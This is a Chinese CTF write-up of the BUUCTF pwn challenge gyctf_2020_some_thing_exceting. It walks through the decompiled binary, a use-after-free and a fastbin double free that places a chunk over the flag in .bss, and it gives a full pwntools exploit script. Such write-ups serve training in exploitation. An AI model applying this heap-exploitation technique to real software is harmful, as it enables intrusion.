gyctf_2020_some_thing_exceting

于 2023-08-26 18:24:32 发布
阅读量106 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132514572
版权

gyctf_2020_some_thing_exceting

挺简单的一道堆题,

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3ff000)

64位没开pie,题目部署在libc2.23

main函数就不贴出来了

unsigned __int64 FLAGBSS()
{
  FILE *stream; // [rsp+0h] [rbp-10h]
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  stream = fopen("/flag", "r");
  if ( !stream )
  {
    puts("Emmmmmm!Maybe you want Fool me!");
    exit(0);
  }
  byte_6020A0 = 0x60;
  fgets(s, 45, stream);
  return __readfsqword(0x28u) ^ v2;
}

把flag读入到bss段并且,在上面有个0x60,正好可以利用起来绕过fastbin的检查

初步思路就是利用doublefree改fd然后绕过fastbin,看看下面是否满足

unsigned __int64 ADD()
{
  int nbytes; // [rsp+Ch] [rbp-24h] BYREF
  int nbytes_4; // [rsp+10h] [rbp-20h] BYREF
  int i; // [rsp+14h] [rbp-1Ch]
  void *buf; // [rsp+18h] [rbp-18h]
  void *v5; // [rsp+20h] [rbp-10h]
  unsigned __int64 v6; // [rsp+28h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  puts("#######################");
  puts("#    Create Banana    #");
  puts("#---------------------#");
  for ( i = 0; i <= 9 && *(&ptr + i); ++i )
  {
    if ( i == 9 )
    {
      puts("#   so much banana!   #");
      puts("#######################");
      return __readfsqword(0x28u) ^ v6;
    }
  }
  *(&ptr + i) = malloc(0x10uLL);
  printf("> ba's length : ");
  _isoc99_scanf("%d", &nbytes);
  if ( nbytes <= 0 || nbytes > 0x70 )
  {
    puts("Emmmmmm!Maybe you want Fool me!");
    EXIT();
  }
  buf = malloc(nbytes);
  printf("> ba : ");
  read(0, buf, (unsigned int)nbytes);
  printf("> na's length : ");
  _isoc99_scanf("%d", &nbytes_4);
  if ( nbytes_4 <= 0 || nbytes_4 > 0x70 )
  {
    puts("Emmmmmm!Maybe you want Fool me!");
    EXIT();
  }
  printf("> na : ");
  v5 = malloc(nbytes_4);
  read(0, v5, (unsigned int)nbytes_4);
  *(_QWORD *)*(&ptr + i) = buf;
  *((_QWORD *)*(&ptr + i) + 1) = v5;
  puts("#---------------------#");
  puts("#      ALL Down!      #");
  puts("#######################");
  return __readfsqword(0x28u) ^ v6;
}

add这里每次调用一次add就申请了3个堆,

第一个堆用来记录第二第三个堆的指针

第二个堆和第三个堆都差不多,size不能大于0x70也就是打fastbin了

菜单上有edit,实际上没有,不贴了

unsigned __int64 DELE()
{
  unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("#######################");
  puts("#    Delete Banana    #");
  puts("#---------------------#");
  printf("> Banana ID : ");
  _isoc99_scanf("%d", &v1);
  if ( v1 > 0xA || !*(&ptr + (int)v1) )
  {
    puts("Emmmmmm!Maybe you want Fool me!");
    EXIT();
  }
  free(*(void **)*(&ptr + (int)v1));
  free(*((void **)*(&ptr + (int)v1) + 1));
  free(*(&ptr + (int)v1));
  puts("#---------------------#");
  puts("#      ALL Down!      #");
  puts("#######################");
  return __readfsqword(0x28u) ^ v2;
}

uaf.

unsigned __int64 SHOW()
{
  unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("#######################");
  puts("#    Delete Banana    #");
  puts("#---------------------#");
  printf("> Banana ID : ");
  printf("> SCP project ID : ");
  _isoc99_scanf("%d", &v1);
  if ( v1 > 0xA || !*(&ptr + (int)v1) )
  {
    puts("Emmmmmm!Maybe you want Fool me!");
    EXIT();
  }
  printf("# Banana's ba is %s\n", *(const char **)*(&ptr + (int)v1));
  printf("# Banana's na is %s\n", *((const char **)*(&ptr + (int)v1) + 1));
  puts("#---------------------#");
  puts("#      ALL Down!      #");
  puts("#######################");
  return __readfsqword(0x28u) ^ v2;
}

调用第一个堆存储的指针输出我们写的两个堆内容

思路跟开头差不多,基本没有阻碍

看一下bss

.bss:00000000006020A0 ??                            byte_6020A0 db ?                        
.bss:00000000006020A1 ?? ?? ?? ?? ?? ?? ??          align 8
.bss:00000000006020A8                               ; char s[64]
.bss:00000000006020A8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+s db 40h dup(?)                         
.bss:00000000006020A8

A8存储的是flag,A0是0x60

下面的0x6020A8-0x10就是在这里建堆,然后刚好0x6020A8处的0x60能绕过fastbin的检查

前提是我们申请是0x50,到这里基本就可以getshell了

下面exp15行为什么是0x60,调试一下就知道了
在这里插入图片描述
如果我们再申请0x50的话,就会把flag也申请进来,但是没有特定的size给他,就会无法绕过fastbin检查,然后就无法getshell了

from pwn import*
from Yapack import *
libc=ELF('./libc-2.23.so') 
context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",26622,"./pwn",10)

bss=0x6020A8-0x10
add(0x50,b'aaaa',0x50,b'bbbb')
add(0x50,b'aaaa',0x50,b'bbbb')
dele(0)
dele(1)
dele(0)
add(0x50,p64(bss),0x50,b'bbbb')
add(0x50,b'aaaa',0x50,b'bbbb')
add(0x50,b'',0x60,b'')			
show(4)
#debug()
ia()

最后因为我们输入了一个\n所以会少掉一个f,不过无伤大雅
在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C++11中的智能指针unique_ptr、shared_ptr和weak_ptr详解
dvlinker的技术专栏
05-28 3万+
详细讲解C++11中引入的智能指针unique_ptr、shared_ptr和weak_ptr。
一文搞懂ROS2的spin_some, spin和ROS的spinOnce
slampai的博客
11-24 4033
讨论ROS1和ROS2的spin、spinOnce和spin_some函数,以通俗的形式,分别三者的异同点。
【pwn】 gyctf_2020_borrowstack
Nothing
03-02 1626
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
【buuctf】gyctf_2020_some_thing_exceting
weixin_51055545的博客
07-22 342
主函数开始时,调用函数,将flag文件打开,注意是在根目录下的flag,然后将flag读到全局变量s处,这个0x60很有帮助,构成了一个堆头;程序申请的0x10的堆块起到了存放指针的作用,很正常的堆布局,直接doublefree,去改指针;64位程序,关闭了pie保护,直接放到ida分析;这里注意要劫持的堆地址为s-0x10,此时;连续申请两次,再show,即可读出flag.将堆块释放后,未将指针置空,存在uaf;先申请2个查看堆布局;漏洞点在删除功能处,...
[BUUCTF]PWN——gyctf_2020_some_thing_exceting
mcmuyanga的博客
01-22 808
gyctf_2020_some_thing_exceting 附件 步骤: 例行检查,64位程序,除了PIE,其他保护全开 本地试运行一下,看看大概的情况 64位ida载入,检索字符串的时候发现了有关flag的信息,由于我本地上没有创建flag文件,所以一开始输出了12行的puts 创建了一个flag,在执行,可以看到经典的堆的菜单 main(),程序主要有3个功能add,delete和show add() delete() show() 利用思路 程序一开始就读入了fl
Sim_EKB_Install_2020_04_17
05-24
PCS7 v8.0, TIA Poprtal, WinCC and key9999 Problems with new ALM v5 Simatic IT Business Objects Enterprise signed keys Official FAQ ...v2020.04.17 add some info for TIA Portal v16, Energy 7.2
BUUCTF-PWN刷题记录-7
weixin_44145820的博客
04-15 967
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
python binascii.b2a_hex_python标准模块介绍- binascii 二进制和ASCII转换
weixin_35995565的博客
01-28 6493
简介binascii模块包含很多用来方法来转换二进制和各种ASCII编码的二进制表示法。通常不直接使用这些功能,而是使用封装模块,如uu, base64或binhex。binascii模块包含用C语言编写更快的低级功能,通常为高级模块所使用。功能:二进制和ASCII转换。类型:标准模块相关模块:base64 标准模块。binhex 标准模块。uu 标准模块。quopri 标准模块。...
[BUUCTF]PWN——gyctf_2020_some_thing_interesting(格式化字符串+UAF)
mcmuyanga的博客
03-11 850
gyctf_2020_some_thing_interesting 附件 步骤 例行检查,64位程序,保护全开 本地试运行一下程序,看看大概的情况 64位ida载入 sub_B7A() check() create()
gyctf_2020_some_thing_exceting复习double free机制(glibc-2.23源码分析向
Tw0的博客
02-10 161
当我们进行double free攻击的时候,如果有一个管理堆块存储着多个下级chunk的指针,那么需要特别注意和管理chunk同样大小的chunk的申请和释放,因为free fastbin chunk的时候,会对其fd指针进行修改,从而导致程序寻找的堆块出现偏差。
i春秋新春战役PWN之Some_thing_exceting
像初雪一样自由洒落
03-09 690
心好累,堆处入手,看明白了,可是总是复盘实现不了。。。不过学长那边可以,是我机子的问题?? 题目链接:https://pan.baidu.com/s/1Tv5Y4ieNVEasZ8oAYYn2Lw 提取码:5td6 文件查看一下 拿到程序发现运行不了,查看文件属性,发现没有执行权限,加一个执行权限 执行不了 因为程序要打开/flag(根目录下flag)文件 ...
gyctf_2020_borrowstack
qq_42728977的博客
04-12 555
栈迁移,这个有点坑。 参考: https://www.cnblogs.com/luoleqi/p/12348341.html
【计算机系统基础bomb lab】CSAPP实验:Bomb Lab
灵新目
05-20 2279
【计算机系统基础bomb lab】CSAPP实验:Bomb Lab
BUUCTF刷题6
m0_51251108的博客
11-03 431
题目:gyctf_2020_some_thing_exceting:mrctf2020_shellcode_revenge:axb_2019_brop64:inndy_echo:wustctf2020_name_your_cat:wdb2018_guess:oneshot_tjctf_2016:zctf2016_note2:ciscn_2019_final_2:wustctf2020_number_game: gyctf_2020_some_thing_exceting: 这题存在uaf漏洞 程序开始时读入
pwn入门小技巧
qq_36918532的博客
05-24 2753
目前我所遇到的一些pwn的做题技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的题越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
buuctf 2022 3.10
m0_57754423的博客
03-10 213
gyctf_2020_some_thing_exceting: 漏洞点: 存在uaf漏洞。 思路: 通过uaf漏洞进行double_free,修改fd即可malloc flag所在地。 exp: from pwn import * from LibcSearcher import * context.terminal = ['tmux', 'splitw', '-h'] local_file = './gy1' local_libc = './libc-2.23.so' # re
CSAPP二进制炸弹实验 bomb lab详细解析
热门推荐
Eternitykc的博客
12-01 1万+
前段时间刚刚昨晚bomb lab实验,记录一下我做CSAPP 二进制炸弹实验的详细过程。有什么问题可以在评论中指出,一起进步。 实验目录实验准备第一关第二关第三关第四关第五关第六关 实验准备 首先需要下载相关的资料。 代码:http://csapp.cs.cmu.edu/3e/bomb.tar GDB命令文档:http://csapp.cs.cmu.edu/3e/docs/gdbnotes-x86-64.pdf 说明:http://csapp.cs.cmu.edu/3e/bomblab.pdf README
No module named 'some_module'
最新发布
04-21
当你在Python中遇到"No module named 'some_module'"的错误时,这通常意味着你尝试导入一个不存在的模块或者模块名称拼写错误。 要解决这个问题,你可以采取以下几个步骤: 1. 检查模块名称拼写:确保你正确地输入了模块的名称。Python对大小写敏感,所以请确保大小写匹配。 2. 检查模块是否存在:确认你尝试导入的模块确实存在于你的Python环境中。你可以使用命令`pip list`来查看已安装的模块列表,或者在Python交互式环境中尝试导入该模块。 3. 安装缺失的模块:如果你确定模块存在但尚未安装,你可以使用`pip install`命令来安装它。例如,如果你想安装名为"some_module"的模块,可以运行`pip install some_module`来安装它。 4. 检查Python环境:有时候,你可能在错误的Python环境中运行代码,导致无法找到模块。确保你在正确的Python环境中运行代码,或者在虚拟环境中安装和运行代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值